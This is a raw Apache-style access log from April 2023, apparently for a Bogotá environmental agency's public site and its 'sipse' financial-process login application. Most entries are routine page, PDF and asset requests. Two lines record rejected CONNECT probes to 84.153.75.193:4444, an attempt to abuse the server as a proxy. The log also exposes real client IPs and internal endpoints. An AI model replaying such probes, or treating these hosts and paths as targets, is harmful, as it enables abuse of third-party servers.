216.245.221.92 - - [09/Apr/2023:19:45:25 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.231 - - [09/Apr/2023:19:45:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3578.pdf HTTP/1.1" 200 412030
173.252.111.118 - - [09/Apr/2023:19:46:10 -0500] "GET /images/incautan-animales-semana-santa-2023.jpeg HTTP/1.1" 200 36611
172.22.2.4 - - [09/Apr/2023:19:47:21 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
74.125.210.162 - - [09/Apr/2023:19:47:23 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
201.245.192.253 - - [09/Apr/2023:19:48:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [09/Apr/2023:19:47:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
200.89.244.60 - - [09/Apr/2023:19:49:39 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
172.22.2.4 - - [09/Apr/2023:19:48:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
216.245.221.92 - - [09/Apr/2023:19:50:25 -0500] "HEAD / HTTP/1.1" 200 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11134
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:28 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
200.89.244.60 - - [09/Apr/2023:19:50:32 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5566
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 15630
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
200.89.244.60 - - [09/Apr/2023:19:50:33 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
200.89.244.60 - - [09/Apr/2023:19:50:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
200.89.244.60 - - [09/Apr/2023:19:50:36 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9145
200.89.244.60 - - [09/Apr/2023:19:50:38 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9145
200.89.244.60 - - [09/Apr/2023:19:50:39 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1473
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 37767
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:50:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.25.77.205 - - [09/Apr/2023:19:50:57 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
190.25.77.205 - - [09/Apr/2023:19:50:57 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
190.25.77.205 - - [09/Apr/2023:19:50:57 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
190.25.77.205 - - [09/Apr/2023:19:50:57 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
190.25.77.205 - - [09/Apr/2023:19:50:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
54.82.27.146 - - [09/Apr/2023:19:51:18 -0500] "HEAD /galeria/galeria/fotos/Humedal-Vaca2G.jpg HTTP/1.1" 200 -
200.89.244.60 - - [09/Apr/2023:19:51:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12868
200.89.244.60 - - [09/Apr/2023:19:51:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 153228
200.89.244.60 - - [09/Apr/2023:19:51:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:51:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:51:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:51:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:51:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:51:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:51:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:52:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 49574
40.77.167.202 - - [09/Apr/2023:19:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/6647.pdf HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:52:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 133110
201.245.192.253 - - [09/Apr/2023:19:53:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.73.72 - - [09/Apr/2023:19:53:20 -0500] "-" 408 -
200.89.244.60 - - [09/Apr/2023:19:54:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40856
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34271
200.89.244.60 - - [09/Apr/2023:19:54:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34271
200.89.244.60 - - [09/Apr/2023:19:54:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12804
200.89.244.60 - - [09/Apr/2023:19:54:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 151130
200.89.244.60 - - [09/Apr/2023:19:54:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:19:54:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 249475
172.22.2.4 - - [09/Apr/2023:19:53:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.11 - - [09/Apr/2023:19:54:53 -0500] "GET /dos-animales-silvestres-carne-y-huevos-de-tortuga-fueron-recuperados-en-semana-santa.html HTTP/1.1" 206 1092
216.245.221.92 - - [09/Apr/2023:19:55:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [09/Apr/2023:19:54:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55924
62.171.175.68 - - [09/Apr/2023:19:56:03 -0500] "CONNECT 84.153.75.193:4444 HTTP/1.1" 405 941
172.22.2.4 - - [09/Apr/2023:19:57:08 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
200.89.244.60 - - [09/Apr/2023:19:57:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 158100
201.245.192.253 - - [09/Apr/2023:19:58:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
191.156.180.217 - - [09/Apr/2023:19:58:54 -0500] "GET /autoridades-frenan-disposicion-de-residuos-de-construccion-cerca-al-humedal-salitre.html HTTP/1.1" 200 935
172.22.2.4 - - [09/Apr/2023:19:58:58 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%207%20del%2015%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 268084
172.22.2.4 - - [09/Apr/2023:19:58:59 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%206%20del%208%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 996625
172.22.2.4 - - [09/Apr/2023:19:58:59 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2003%20del%2026%20de%20Julio%20de%202016.pdf HTTP/1.1" 200 370200
172.22.2.4 - - [09/Apr/2023:19:59:00 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 200 1416322
62.171.175.68 - - [09/Apr/2023:20:00:06 -0500] "CONNECT 84.153.75.193:4444 HTTP/1.1" 405 941
200.89.244.60 - - [09/Apr/2023:20:00:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40792
200.89.244.60 - - [09/Apr/2023:20:00:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34207
200.89.244.60 - - [09/Apr/2023:20:00:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34207
200.89.244.60 - - [09/Apr/2023:20:00:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34207
200.89.244.60 - - [09/Apr/2023:20:00:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34207
200.89.244.60 - - [09/Apr/2023:20:00:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12758
216.245.221.92 - - [09/Apr/2023:20:00:25 -0500] "HEAD / HTTP/1.1" 200 -
200.89.244.60 - - [09/Apr/2023:20:00:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 147606
200.89.244.60 - - [09/Apr/2023:20:00:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:00:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 90793
200.89.244.60 - - [09/Apr/2023:20:00:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 132855
172.22.2.4 - - [09/Apr/2023:19:59:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.95.16.99 - - [09/Apr/2023:20:01:01 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
172.22.2.4 - - [09/Apr/2023:19:59:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
173.252.95.116 - - [09/Apr/2023:20:02:34 -0500] "GET /camino-guadalupe-aguanoso-abierto-de-nuevo-al-publico.html HTTP/1.1" 206 879
69.171.231.116 - - [09/Apr/2023:20:02:35 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
40.77.167.181 - - [09/Apr/2023:20:02:44 -0500] "-" 408 -
201.245.192.253 - - [09/Apr/2023:20:03:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.231 - - [09/Apr/2023:20:03:43 -0500] "GET /BLA/resoluciones/AUTOS%202018/5940.pdf HTTP/1.1" 200 258707
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40746
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:03:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34161
200.89.244.60 - - [09/Apr/2023:20:03:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34161
200.89.244.60 - - [09/Apr/2023:20:03:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34161
200.89.244.60 - - [09/Apr/2023:20:03:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34161
200.89.244.60 - - [09/Apr/2023:20:03:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34161
200.89.244.60 - - [09/Apr/2023:20:03:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34161
200.89.244.60 - - [09/Apr/2023:20:03:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12799
200.89.244.60 - - [09/Apr/2023:20:04:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 154656
200.89.244.60 - - [09/Apr/2023:20:04:05 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:04:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:04:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:04:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:04:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:04:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:04:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.206.110 - - [09/Apr/2023:20:04:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.61.206.110 - - [09/Apr/2023:20:04:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.61.206.110 - - [09/Apr/2023:20:04:14 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
200.89.244.60 - - [09/Apr/2023:20:04:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 75076
172.22.2.4 - - [09/Apr/2023:20:03:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62202
200.89.244.60 - - [09/Apr/2023:20:04:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 155040
216.245.221.92 - - [09/Apr/2023:20:05:25 -0500] "HEAD / HTTP/1.1" 200 -
74.125.210.162 - - [09/Apr/2023:20:06:00 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
40.77.167.98 - - [09/Apr/2023:20:06:05 -0500] "GET /galeria/galeria/fotos/Capellania2P.jpg HTTP/1.1" 200 35380
172.22.2.4 - - [09/Apr/2023:20:04:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.72 - - [09/Apr/2023:20:07:16 -0500] "-" 408 -
172.22.2.4 - - [09/Apr/2023:20:05:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
201.245.192.253 - - [09/Apr/2023:20:08:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
200.89.244.60 - - [09/Apr/2023:20:09:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40787
200.89.244.60 - - [09/Apr/2023:20:09:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:09:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:09:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
